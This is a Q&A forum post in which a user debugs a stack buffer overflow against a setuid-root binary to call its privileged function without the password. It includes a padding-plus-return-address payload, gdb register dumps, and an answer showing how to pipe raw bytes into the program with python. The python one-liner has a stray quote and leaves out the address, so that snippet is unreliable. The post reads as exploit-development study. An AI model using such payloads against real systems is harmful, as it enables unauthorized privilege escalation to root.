# Buffer overflow function address is escaped

Tags: assembly, gdb

I have an executable that I don't have debugging symbols for or any source code. It basically asks you for a password and gives you root if you give it the correct one (not as a command-line argument though).

```
ls -l:
-rwsrwxr-x 1 root  root  5542 Feb 28  2017 elevate
```

I am trying to do a buffer overflow and execute a specific function from the program which is usually only called if the password is correct. I used `info functions` to get the address of the function and now I am constructing the exploit.

The following input just causes the overflow and overwrites the registers below in that way.

```
buffer,     ebp ,       eip
24 chars, 4 chars, 4 chars
aaaaaaaaaaaaaaaaaaaaaaaabbbbcccc - 24a and 4b, 4c
```

Therefore I tried (with the address of the function):

```
aaaaaaaaaaaaaaaaaaaaaaaabbbb\xdc\x84\x04\x08
```

However, for some reason it doesn't work and what happens is:

```
EBP: 0x62626262 ('bbbb')
ESP: 0xbffffc40 ("\\x84\\x04\\x08")
EIP: 0x6364785c ('\\xdc')
```

Basically the register gets overwritten with the wrong value since the slashes are escaped....Why is that and how can I fix it?

Comment: That depends on how you are feeding the input to the program. You must use something to convert the backslash escapes for you.

Answer (score 1, accepted):

Since the program takes input via `scanf` you need to use the following format inside gdb:
This syntax simulates input from the keyboard.

```
run < <(python -c 'print "a"*28"')
```

or outside of gdb:

python -c 'print "a"*28"' | ./program

Comment: *This syntax simulates input from the keyboard.*  Not exactly; input is coming from a pipe, not a TTY.  But yes, it's a good way to feed binary data to a program's stdin.